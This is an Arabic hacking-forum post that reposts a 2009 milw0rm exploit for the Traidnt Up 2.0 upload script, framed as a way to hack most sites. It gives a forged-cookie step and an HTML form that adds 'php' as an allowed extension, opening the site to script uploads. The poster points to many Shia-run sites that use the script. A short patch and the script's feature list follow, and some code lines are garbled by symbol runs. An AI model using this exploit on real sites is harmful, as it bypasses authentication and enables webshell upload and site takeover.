ثغرة تمكنك من اختراق 90% من المواقع الحقو قبل الترقيع ؟

شلونكم شباب


اليوم جايبلكم
ثغرة تمكنك من اختراق 90% من المواقع الحقو قبل الترقيع ؟

كود:

<

الكود:

html>
<center>
<br>
<br>
<!--
#########################################################
#
#    Traidnt Up version 2.0 Add Extension By Pass
#    Author: SP4rT
#    Email : SP4rt@Yahoo.coM
#    DownLoad : http://traidnt.net/vb/showthread.php?t=943260
#    Downloads : 33712
#
#    1.    Enter uploadcp url 
#    2.    javascript:document&@#&@#&@#&@#&@#&@#="trupuser=SP4rT;";
#    3.    Enter this Page After Edit {script_path} & PosT your Extension .
#
#########################################################
-->
<form name='traidnt-ext' action='http:/{script_path}/uploadcp/files.php?do=extension&go=add' method='POST'>
<table border='1' width='450'>
<tr>
<td align='center' colspan='2'>Add Extension :</td>
</tr>
<tr>
<td align=center><input type='text' name='exname' value='php'>
<input type='hidden' name='maxsize' value='1000000000000'>
<input type='submit' value='  Add Ext  '>

</td>
</tr>
</table>

# milw0rm.com [2009-03-11]

المصدر
http://www.milw0rm.com/exploits/8202

لااحد يقلي المركز عربي في مواقع شيعيه كثيره مركبه السكربت
هذا شرح للثغره من اخونا واوي البصره
الرابط http://www.hackteach.net/download.ph...Traidnt-UP.rar
الثغرة هاي ممكن اي احد يضيف اي امتداد ف مركز التحميل
الترقيع ......
بسم الله الرحمن الرحيم

الثغرة هاي يا جماعة خطيرة جدا جدا واخطر من اللي قبلها بكتير

الثغرة هاي نتيجة عن خطأ في نظام تسجيل الدخول

قم بتحرير ملف uploadcp/adminquery.php :

ابحث عن :
كود PHP:

الكود:

echo "&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"2; url=login.php\">";

اضف بعده مباشرة :
كود PHP:

الكود:

die(); 

TRAIDNT UP v2.0
- مميزات الاسكربت :
1- السرعة والأمان التام بعمل الاسكربت .
2- إمكانية ختم الصور بـصورة خاصة لموقعك logo
3- إمكانية تحديد مصغرات الصور عن طريق لوحة التحكم ( العرض والارتفاع) .
4- إمكانية تحديد عدد ثواني قبل تحميل الملف .
5- إمكانية تحديد سابقة لاسم الملفات والصور مثال (domain-123.jpg).
6- إذا كانت مساحة موقعك محدودة بإمكانك تحديد مساحة مخصصة لمركز التحميل بحيث إذا تجاوز المركز المساحة المحدودة يتم إغلاقه .
7- إمكانية فتح / إغلاق المركز
8- إمكانية وضع صورة للتحقق عند رفع الملفات
9- إمكانية وضع صورة للتحقق عند الاتصال بالمدير
10- إمكانية وضع صورة للتحقق عند إرسال الملف لصديق .
11- أمكانيه التحكم بالامتدادات المسموحة .
12- إمكانية التحكم بأقصى حجم لكل امتداد من الامتداد المسموحة .
13- إمكانية البحث عن ملفات ( باسم الملف - حجم الملف - امتداد الملف - اي بي الزائر ) .
14- إمكانية مشاهده الصور منذ آخر زيارة علي حدي .
15- إمكانية مشاهده الملفات منذ آخر زيارة علي حدي .
16- خاصية التبليغ عن الملفات والتحكم بها عن طريق لوحة التحكم .
17- إمكانية تعديل ( قوانين المركز - إعلانات ) عن طريق لوحة التحكم .
18 - إدارة شامله لحظر الايبهات .
19- إمكانية النسخ الاحتياطي لقاعدة البيانات .
20- اعتماد المركز علي نظام قوالب مما يسهل تعدد الاستيلات وسهولة تصميم المركز .
21- إمكانية تغير لغة المركز بكل سهولة .
22- تنسيق امتدادات الملفات حيث يظهر لكل امتداد صورة محددة عن التحميل من قبل الزائر .
23- نظام إحصائيات للموقع يحدد ترتيب اليسكا والبيج رانك عدد الملفات المرفوعة وعدد الصور المرفوعة .

- الاضافات الجديدة بالاسكربت :


1- اضافه خاصية الملاحظات بلوحة الادارة
2 - اضافه خيارات تعديل اللغة والاستايل بلوحة التحكم
3- اضافه خاصية التحميل المتعدد
4- اضافه خاصية عرض كافة الملفات
5- اضافه خاصية عرض كافة الصور
6 - اضافه خيار حذف الملفات علي حسب المدة من رفعها
7 - اضافه خاصية اغلاق رفع الملفات وبنفس الوقت يستطيع الزائر تحميل من الملفات المرفوعه سابقاً
8 - اضافه خاصية حذف الملفات منذ اخر زيارة عن طريق الاجاكس
9- اعاده هيكلة وبناء السكربت
والمزيد من الخصائص التي يمكنك اكتشافها بنفسك

- طريقة تنصيب السكربت :


1- قم بتعديل معلومات قاعده البيانات بملف config.php
2- قم برفع مجلد السكربت الي موقعك
4- قم بالتوجه الي ملف install.php واتبع التعليمات

- طريقة الترقية من الاصدار الاول :


1- قم باخذ نسخة احتياطية من المركز "يمكنك الاستعانه بمستضيفك"
2- قم بنسخ معلومات قاعده البيانات من ملف config.php
3- قم بحذف جميع محتويات مجلد مركز التحميل عدا مجلد uploads وما بداخله
4- قم بتعديل معلومات قاعده البيانات بملف codnfig.php بالسكربت الجديد الي بمعلومات القاعده التي اخذتها من ملف config القديم "نفس القاعده القديمة"
5- قم برفع ملفات السكربت الجديد الي المجلد القديم عدا مجلد uploads
6 - قم باستدعاء الملف التالي http://domain.com/up/install/upgrade.php واتبع التعليمات

- متطلبات عمل السكربت :


1- اصدارة php5 ومافوقها
2- اصدار Gd2 ومافوقها
3- مديول iconv


فى رعايه الله اخوكم محمد




C u






أخوكم
محمد البصراوي

أيملي للمراسله

EVELL_HAKAR@YAHOO.COM